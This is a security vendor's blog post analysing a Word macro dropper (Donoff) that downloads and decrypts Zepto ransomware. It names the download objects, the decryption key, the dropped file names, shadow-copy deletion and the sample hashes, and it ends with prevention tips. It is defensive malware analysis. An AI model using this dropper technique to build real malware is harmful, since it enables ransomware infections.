Recently, we’ve spotted Zepto ransomware spreading through spam email containing fake invoices (see image below). These attachments contain a Macro-Enabled word document file known as Donoff, which downloads the Zepto executable that encrypts all your files and will later ask for payment of the decryption key.
We decided to take a closer look on the Donoff macro used in downloading the Zepto ransomware. Here’s what we found:
The VBA Macro code
At first glance, the code is fully commented in Spanish and uses some random generated variable names.
Here a look at the code:
The Word document contains two macro functions, autoopen and ActualizarEntrada.
Here are more snips of code showing the processing of obfuscated text.
These are the strings revealed after deobfuscation.
This VBScript uses Microsoft.XMLHTTP and Adodb.Stream Objects to download Zepto.
The Microsoft.XMLHTTP object is one of Microsoft’s XML DOM (Document Object Model) modules that is intended to deliver client-side access to XML documents on remote servers through the HTTP protocol. This object is used to request or send any type of document.
The ADODB.Stream Object is used to read, write and manage a stream of binary data or text.
The following code decrypts to
Here’s the code that downloads the encrypted Zepto executable file.
The encrypted file is stored to the file system as TempWFDSAdrweg. It then uses this key Aw3WSr7dB3RlPpLVmGVTtXcQ3WG8kQym to decrypt and stores the decrypted binary to the file sysdrubpas.exe in the %temp% folder. %temp% folder is usually the C:Users<username>AppDataLocalTemp folder.
Encrypted Zepto (Displayed here in Hexadecimals):
Decrypted Zepto (now in Executable form):
The script then executes sysdrubpas.exe infecting the system of the user.
ThreatAnalyzer – Malware Sandbox Analysis
When executed in our malware analysis sandbox ThreatAnalyzer, here’s the process tree caused by the malicious Word document
One notable common behavior of ransomware is how it deletes shadow copies to prevent easy restoration from Windows backup.
Other behaviors are very similar to our previous post about Zepto ransomware: https://blog.threattrack.com/ransomware-packed-into-wsf-spam/.
Prevent Ransomware Infections?
To prevent ransomware, we recommended you block it early from the root of its infection chain. Here are some tips:
- Always keep your operating system, applications and security products patched and up to date
- Take precaution when opening attachments, especially when sent by an unknown sender
- Never enable VBA macros by default for any Microsoft Office application. Some macro malwares even tell you how to enable macros or may mislead you in doing so.
- Deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure
- Regularly back up your data
e98aee56175daaa96f259d04077d820f – malicious DOC attachment (Trojan-Downloader.O97M.Donoff.by (v))
837a5b0dbd5850634bfecadadc751cdd – Zepto executable (Trojan.Win32.Generic!BT)
Analysis by Wilmina Elizon
About Author ThreatTrack Security Labs
ThreatTrack Security Labs is the power behind the malware analysis, detection and remediation technologies developed by ThreatTrack Security. From facilities in the United States and the Philippines, our team of cybersecurity professionals, malware researchers, engineers and software developers work around the clock to discover and combat Advanced Persistent Threats, targeted attacks, Zero-days and other sophisticated malware. The company develops advanced cybersecurity solutions that Expose, Analyze and Eliminate the latest malicious threats, including its ThreatSecure advanced threat detection and remediation platform, ThreatAnalyzer malware behavioral analysis sandbox, ThreatIQ real-time threat intelligence service, and VIPRE business antivirus endpoint protection. Learn more about ThreatTrack Security.